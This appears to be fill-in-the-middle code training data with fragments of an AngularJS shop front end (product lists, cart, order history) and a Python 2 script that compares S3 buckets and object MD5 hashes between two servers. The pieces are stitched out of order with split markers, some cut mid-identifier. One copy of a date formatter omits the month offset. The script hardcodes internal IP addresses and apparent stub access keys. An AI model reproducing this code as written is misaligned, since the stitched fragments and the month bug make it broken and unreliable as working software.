$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime));
$scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
})
//转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth()+1;//getMonth() is zero-based, so +1 gives the calendar month
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
}
| identifier_name |
||
index.js | /**
* Created by bjwsl-001 on 2016/11/9.
*/
var app=angular.module("NBA",['ng','ngRoute']);
//设置post请求的响应头部
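//Note: Angular's $http posts JSON by default, but the PHP endpoints below receive form-encoded
//bodies built with jQuery's $.param(), so the default POST Content-Type is overridden here.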
app.run(function($http){
$http.defaults.headers.post={"Content-Type":"application/x-www-form-urlencoded"};
})
//设置根控制器
app.controller("rootCtrl",["$scope","$rootScope","$location","$routeParams","$http",function($scope,$rootScope,$location,$routeParams,$http){
//跳转到该路由时先判断屏幕宽度;
$rootScope.userId=1;//用来保存用户的id;
$rootScope.userName="lijun";//用户名;后续功能完善后在删除
$rootScope.pclass="";//查询商品类别;
$rootScope.searchMsg={};//查询信息
$rootScope.searchMsg.pageNum=1;
$rootScope.num=[];//分页数字数组
$rootScope.len=8;//每页记录数
$rootScope.proList=[];//保存商品列表数据
$rootScope.isMore=true;//是否有后一页
$rootScope.isPrev=false;//是否有前一页
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
//判断分页按钮状态
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
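//loadMore(n, url) is the shared pager: it stores the requested page number, issues a GET with the
//current searchMsg parameters, rewrites each item's img_sm to its *sm.jpg thumbnail and pushes it
//onto proList. On viewports wider than 450px the list and the page-number array are rebuilt for
//numbered pagination; on narrower (mobile) screens the page bar is hidden and results are appended.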
$rootScope.loadMore=function(n,url) {
//接收要跳转到的页面
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {//页面宽度不是手机页面时清空列表实现分页加载商品详情
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
$scope.isMyOrder=true;
$scope.orderList=null;
$http.get("data/12_showOrder.php?uname="+$rootScope.userName).success(function(data){
$scope.orderList=data;
for(var i=0;i<$scope.orderList.length;i++){
var date=new Date(Number($scope.orderList[i].orderTime)); | //转换日期格式
$scope.changeTime=function(date){
var year=date.getFullYear();
var mouth=date.getMonth();
mouth=mouth<10?("0"+mouth):mouth;
var day=date.getDate();
day=day<10?("0"+day):day;
var hour=date.getHours();
hour=hour<10?("0"+hour):hour;
var minues=date.getMinutes();
minues=minues<10?("0"+minues):minues;
var second=date.getSeconds();
second=second<10?("0"+second):second;
return year+'-'+mouth+'-'+day+'\n'+hour+":"+minues+":"+second;
}
//判断订单状态
$scope.judgeStatus=function(status){
switch(status){
case "1":
return "等待付款";
break;
case "2":
return "等待配货";
break;
case "3":
return "运输中";
break;
case "4":
return "已收货";
break;
}
}
}
}]);
function chose(obj){
$(obj).addClass("color-box-active").parent().siblings("label").children(".color-box-active").removeClass("color-box-active");
} | $scope.orderList[i].orderTime=$scope.changeTime(date);
var status=$scope.orderList[i].status;
$scope.orderList[i].status=$scope.judgeStatus(status);
}
}) | random_line_split |
checkData.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import s3PyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
def getAllObjectsFromXML(xmlBody):
keys = r | tMarkerFromXML(xmlBody, markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
elif httpResponse.status < 500:
logging.warn('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url,waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
else:
logging.error('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime: [%.3f], responseStatus:[%s], %r, %r' \
%(s3Request.requestType, localAddr, peerAddr,s3Request.url, waitResponseTime, status, str(httpResponse.msg), recvBody[0:1024]))
if (httpResponse.status == 503):
flowControllMsg = 'Service unavailable, local data center is busy'
if recvBody.find(flowControllMsg) != -1: status = '503 Flow Control' #标记外部流控
requestID = httpResponse.getheader('x-amz-request-id', '9999999999999998')
#部分错误结果的头域中没有包含x-amz-request-id,则从recvBody中获取
if requestID == '9999999999999998' and httpResponse.status >= 300:
requestID = _getRequestIDFromBody_(recvBody)
if s3Request.method != 'HEAD' and contentLength != -1 and contentLength != recvBytes:
logging.error('data error. contentlength %d != dataRecvSize %d' %(contentLength, recvBytes))
raise Exception("Data Error Content-Length")
except KeyboardInterrupt:
if not status: status = '9991 KeyboardInterrupt'
except Exception, data:
returnData = None
import traceback
stack = traceback.format_exc()
logging.error('Caught exception:%s, Request:[%s], conn: [local:%s->peer:%s], URL:[%s], responseStatus:[%s], responseBody:[%r]' \
%(data, s3Request.requestType, localAddr, peerAddr, s3Request.url, status, recvBody[0:1024]))
logging.error('print stack: %s' %stack)
print 'ERROR: request %s/%s except: %s' %(s3Request.bucket, s3Request.key, stack)
finally:
if not end_time: end_time = time.time()
#关闭连接:1.按服务端语义,若connection:close,则关闭连接。
if httpResponse and (httpResponse.getheader('connection', '').lower() == 'close' or httpResponse.getheader('Connection', '').lower() == 'close'):
#关闭连接,让后续请求再新建连接。
logging.info('server inform to close connection')
myHTTPConnection.closeConnection()
#2.客户端感知的连接类错误,关闭连接。
elif not status <= '600':
logging.warning('caught exception, close connection')
#很可能是网络异常,关闭连接,让后续请求再新建连接。
myHTTPConnection.closeConnection()
time.sleep(.1)
#3.客户端配置了短连接
elif not myHTTPConnection.longConnection:
#python 2.7以下存在bug,不能直接使用close()方法关闭连接,不然客户端存在CLOSE_WAIT状态。
if myHTTPConnection.isSecure:
try:
import sys
if sys.version < '2.7':
import gc
gc.collect(0)
except: pass
else: myHTTPConnection.closeConnection()
if process: MD5_Global = returnData
return returnData
if __name__ == '__main__':
global MD5_Global
printResult = time.time()
Service_1= '100.61.5.3'
Service_2 = '100.61.5.13'
#可以指定多个用户的AK,SK
User_AKSK = ['UDSIAMSTUBTEST000101,Udsiamstubtest000000UDSIAMSTUBTEST000101',]
#server = '127.0.0.1', isSecure = False, timeout=80, serialNo = None, longConnection = False
server1_conn = s3PyCmd.MyHTTPConnection(host=Service_1, isSecure=False, timeout=600, serialNo=0, longConnection=False)
server2_conn = s3PyCmd.MyHTTPConnection(host=Service_2, isSecure=False, timeout=600, serialNo=0, longConnection=False)
totalObjectsOK = 0
totalObjectsErr = 0
totalReadErr = 0
userOK=True
for AKSK in User_AKSK:
print 'INFO: compare user %s' %AKSK
#列举用户所有桶
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListUserBuckets', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost = False, domainName = '', region='')
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Buckets_1 = make_request(s3Requesthandler1)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Buckets_2 = make_request(s3Requesthandler2)
#比较桶是否一致
Buckets_1 = getAllBucketsFromXML(Buckets_1)
Buckets_2 = getAllBucketsFromXML(Buckets_2)
logging.info('Buckets_1: %r, Buckets_2: %r' %(Buckets_1, Buckets_2))
print 'Buckets on Server1: %r, Buckets on Server2: %r' %(Buckets_1, Buckets_2)
Buckets = set(Buckets_1) & set(Buckets_2)
if not Buckets:
logging.error('find no same buckets exit')
print 'ERROR: no same buckets for this user'
break
open('Objects_1_List.txt','w').write('')
open('Objects_2_List.txt','w').write('')
#遍历桶
for bucket in Buckets:
open('Objects_1_List.txt','a').write('\n' + bucket)
open('Objects_2_List.txt','a').write('\n' + bucket)
msg = 'INFO: compare bucket: %s' %bucket
logging.info(msg)
print msg
s3Request = s3PyCmd.S3RequestDescriptor(requestType = 'ListObjectsInBucket', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request.queryArgs['max-keys'] = '999'
s3Request.queryArgs['versions'] = None
s3Request.bucket = bucket
Objects_1_List = []; Objects_2_List = []
k_marker1 = ''; k_marker2=''
v_marker1 = ''; v_marker2=''
while k_marker1 != None or k_marker2 != None:
if k_marker1 != None:
if k_marker1: s3Request.queryArgs['key-marker'] = k_marker1
if v_marker1: s3Request.queryArgs['version-id-marker'] = v_marker1
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request, server1_conn)
Objects_1 = make_request(s3Requesthandler1)
k_marker1 = getMarkerFromXML(Objects_1, 'NextKeyMarker')
v_marker1 = getMarkerFromXML(Objects_1, 'NextVersionIdMarker')
if v_marker1 == 'null': v_marker1 = None
newObjs1 = getAllObjectsFromXML(Objects_1)
Objects_1_List += newObjs1
logging.debug('Objects_1_List: %s' %Objects_1_List)
open('Objects_1_List.txt','a').write('\n\t' + str(newObjs1).replace('), (', '\n\t'))
if k_marker2 != None:
if k_marker2: s3Request.queryArgs['key-marker'] = k_marker2
if v_marker2: s3Request.queryArgs['version-id-marker'] = v_marker2
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request, server2_conn)
Objects_2 = make_request(s3Requesthandler2)
k_marker2 = getMarkerFromXML(Objects_2, 'NextKeyMarker')
v_marker2 = getMarkerFromXML(Objects_2, 'NextVersionIdMarker')
if v_marker2 == 'null': v_marker2 = None
newObjs2 = getAllObjectsFromXML(Objects_2)
Objects_2_List += newObjs2
logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
#找到合集中相同集合
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
#校验obj
for obj in Obj12:
#2边读对象
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
s3Request_getobj = s3PyCmd.S3RequestDescriptor(requestType = 'GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request_getobj.bucket = bucket
s3Request_getobj.key = obj[0]
if obj[1]: s3Request_getobj.queryArgs['versionId'] = obj[1]
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request_getobj, server1_conn)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request_getobj, server2_conn)
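# Fetch the object from both servers concurrently: the worker thread runs make_request with
# process=True so it publishes its MD5 through the module-level MD5_Global (a Thread target
# cannot return a value), while the main thread downloads from server2 and gets md5_2 directly.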
t1 = threading.Thread(target=make_request, name='thread1', args=(s3Requesthandler1, True, True))
t1.start();
md5_2 = make_request(s3Requesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
#去掉各自相同的部分
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
#如果不相同的部分相差超过了10000个,跳过该桶
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
| e.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def ge | identifier_body |
checkData.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import s3PyCmd
import hashlib
import random
import logging
import re
import time
import os
import threading
logFile = 'log/checkData.log'
if not os.path.exists('log'): os.mkdir('log')
if os.path.exists(logFile) and os.path.getsize(logFile) > 104857600: os.remove(logFile)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(thread)d %(filename)s:%(lineno)d %(levelname)s %(message)s', filename=logFile, filemode='a')
MD5_Global = None
def getAllBucketsFromXML(xmlBody):
return sorted(re.findall('<Name>(.+?)</Name>', xmlBody))
#返回列表
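# Returns a list of (key, versionId) tuples, e.g.
# '<Key>a.jpg</Key><VersionId>null</VersionId><Key>b.jpg</Key><VersionId>v2</VersionId>'
# yields [('a.jpg', None), ('b.jpg', 'v2')]; for non-versioned listings every versionId is None.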
def getAllObjectsFromXML(xmlBody):
keys = re.findall('<Key>(.+?)</Key>', xmlBody)
versions = re.findall('<VersionId>(.+?)</VersionId>', xmlBody)
for i in range(len(versions)):
if versions[i] == 'null': versions[i]=None
if len(versions)>0 and len(versions) != len(keys):
logging.error('response error, versions != keys %s' %xmlBody)
return []
if not len(versions): versions = [None for i in range(len(keys))]
return zip(keys,versions)
def getMarke | , markerStr):
marker = re.findall('<' + markerStr + '>(.+?)</' + markerStr + '>', xmlBody)
if marker and marker[0]:
logging.info('get marker in response %s' %marker[0])
return marker[0]
else:
logging.info('get no marker in response')
return None
#若calMd5为True,返回body MD5,否则返回响应body内容。
#若响应错误,返回空。
def make_request(s3Requesthandler,calMd5 = None, process=None):
global MD5_Global
myHTTPConnection = s3Requesthandler.myHTTPConnection
s3Request = s3Requesthandler.s3Request
returnData = None
#如果计算MD5则随机一个CHUNK_SIZE,否则固定CHUNK_SIZE大小。
if calMd5:
md5hashPart = 0; md5hashTotal = 0; fileHash = hashlib.md5();
checkData = False
CHUNK_SIZE = random.randint(4096,1048576)
logging.debug('CHUNK_SIZE: %d' %CHUNK_SIZE)
else: CHUNK_SIZE = 65536
peerAddr = myHTTPConnection.host; localAddr = ''
httpResponse = None
recvBody = ''
start_time = time.time()
end_time=0; status = '9999 '
try:
start_time = time.time()
myHTTPConnection.connection.putrequest(s3Request.method, s3Request.url, skip_host=1)
#发送HTTP头域
for k in s3Request.headers.keys():
myHTTPConnection.connection.putheader(k, s3Request.headers[k])
myHTTPConnection.connection.endheaders()
localAddr = str(myHTTPConnection.connection.sock._sock.getsockname())
peerAddr = str(myHTTPConnection.connection.sock._sock.getpeername())
logging.debug( 'Request:[%s], conn:[%s->%s], sendURL:[%s], sendHeaders:[%r], sendContent:[%s]' \
%(s3Request.requestType, localAddr, peerAddr, s3Request.url, s3Request.headers, s3Request.sendContent[0:1024]))
myHTTPConnection.connection.send(s3Request.sendContent)
waitResponseTimeStart = time.time()
#接收响应
httpResponse = myHTTPConnection.connection.getresponse(buffering=True)
waitResponseTime = time.time() - waitResponseTimeStart
logging.debug('get response, wait time %.3f' %waitResponseTime)
#读取响应体
contentLength = int(httpResponse.getheader('Content-Length', '-1'))
logging.debug('get ContentLength: %d' %contentLength)
#区分不同的请求,对于成功响应的GetObject请求,需要特殊处理,否则一次读完body内容。
#需要考虑range下载,返回2xx均为正常请求。
recvBytes = 0
if (httpResponse.status < 300) and s3Request.requestType in ('GetObject'):
#同时满足条件,才校验数据内容。
#1.打开calMd5开关。2.GetObject操作;3.正确返回200响应(206不计算)
while True:
datatmp = httpResponse.read(CHUNK_SIZE)
if not datatmp: break
recvBytes += len(datatmp)
if calMd5:
lastDatatmp = datatmp
fileHash.update(datatmp)
recvBody = '[receive content], length: %d' %recvBytes
if calMd5:
md5hashTotal = fileHash.hexdigest( )
returnData = md5hashTotal
else:
returnData = recvBody
else:
returnData = httpResponse.read()
recvBytes = len(returnData)
#要读完数据才算请求结束
end_time = time.time()
status = str(httpResponse.status) + ' ' + httpResponse.reason
#记日志、重定向(<400:debug; >=400,<500: warn; >=500:error)
if httpResponse.status < 400:
logging.debug('Request:[%s], conn: [%s->%s], URL:[%s], waitResponseTime:[%.3f], responseStatus:[%s], %r, %r' \
